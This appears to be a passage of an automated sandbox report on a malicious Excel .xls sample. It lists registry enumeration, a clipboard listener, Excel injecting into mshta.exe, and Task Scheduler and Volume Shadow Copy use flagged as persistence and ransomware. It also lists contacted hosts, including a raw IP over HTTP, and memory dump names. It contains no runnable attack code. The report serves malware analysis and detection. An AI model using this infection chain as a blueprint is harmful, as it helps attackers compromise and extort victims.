Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4380 wrote to memory of 2196 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe
PID 4380 wrote to memory of 2196 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\1d7c97138b80caa4a9721ce7575926397613df390e74a0642399918575044a72.xls"

C:\Windows\System32\mshta.exe

C:\Windows\System32\mshta.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 roaming.officeapps.live.com udp
IE 52.109.76.243:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 ir.cx udp
US 172.67.197.42:443 ir.cx tcp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 240.76.109.52.in-addr.arpa udp
US 8.8.8.8:53 25.140.123.92.in-addr.arpa udp
US 8.8.8.8:53 243.76.109.52.in-addr.arpa udp
US 8.8.8.8:53 c.pki.goog udp
FR 216.58.214.163:80 c.pki.goog tcp
US 8.8.8.8:53 42.197.67.172.in-addr.arpa udp
US 8.8.8.8:53 163.214.58.216.in-addr.arpa udp
NL 45.66.231.209:80 45.66.231.209 tcp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 209.231.66.45.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 14.179.89.13.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 10.27.171.150.in-addr.arpa udp

Files

memory/4380-0-0x00007FFC14870000-0x00007FFC14880000-memory.dmp

memory/4380-2-0x00007FFC14870000-0x00007FFC14880000-memory.dmp

memory/4380-4-0x00007FFC14870000-0x00007FFC14880000-memory.dmp

memory/4380-1-0x00007FFC14870000-0x00007FFC14880000-memory.dmp

memory/4380-3-0x00007FFC5488D000-0x00007FFC5488E000-memory.dmp

memory/4380-5-0x00007FFC547F0000-0x00007FFC549E5000-memory.dmp

memory/4380-6-0x00007FFC14870000-0x00007FFC14880000-memory.dmp

memory/4380-12-0x00007FFC12810000-0x00007FFC12820000-memory.dmp

memory/4380-11-0x00007FFC547F0000-0x00007FFC549E5000-memory.dmp

memory/4380-10-0x00007FFC547F0000-0x00007FFC549E5000-memory.dmp

memory/4380-13-0x00007FFC12810000-0x00007FFC12820000-memory.dmp

memory/4380-9-0x00007FFC547F0000-0x00007FFC549E5000-memory.dmp

memory/4380-8-0x00007FFC547F0000-0x00007FFC549E5000-memory.dmp

memory/4380-7-0x00007FFC547F0000-0x00007FFC549E5000-memory.dmp

memory/2196-34-0x00007FFC547F0000-0x00007FFC549E5000-memory.dmp

memory/2196-35-0x00007FFC547F0000-0x00007FFC549E5000-memory.dmp

memory/2196-37-0x00007FFC547F0000-0x00007FFC549E5000-memory.dmp

memory/4380-42-0x00007FFC547F0000-0x00007FFC549E5000-memory.dmp

memory/2196-43-0x00007FFC547F0000-0x00007FFC549E5000-memory.dmp

memory/2196-44-0x00007FF68EE70000-0x00007FF68EE78000-memory.dmp

memory/4380-76-0x00007FFC14870000-0x00007FFC14880000-memory.dmp

memory/4380-75-0x00007FFC14870000-0x00007FFC14880000-memory.dmp

memory/4380-74-0x00007FFC14870000-0x00007FFC14880000-memory.dmp

memory/4380-73-0x00007FFC14870000-0x00007FFC14880000-memory.dmp

memory/4380-77-0x00007FFC547F0000-0x00007FFC549E5000-memory.dmp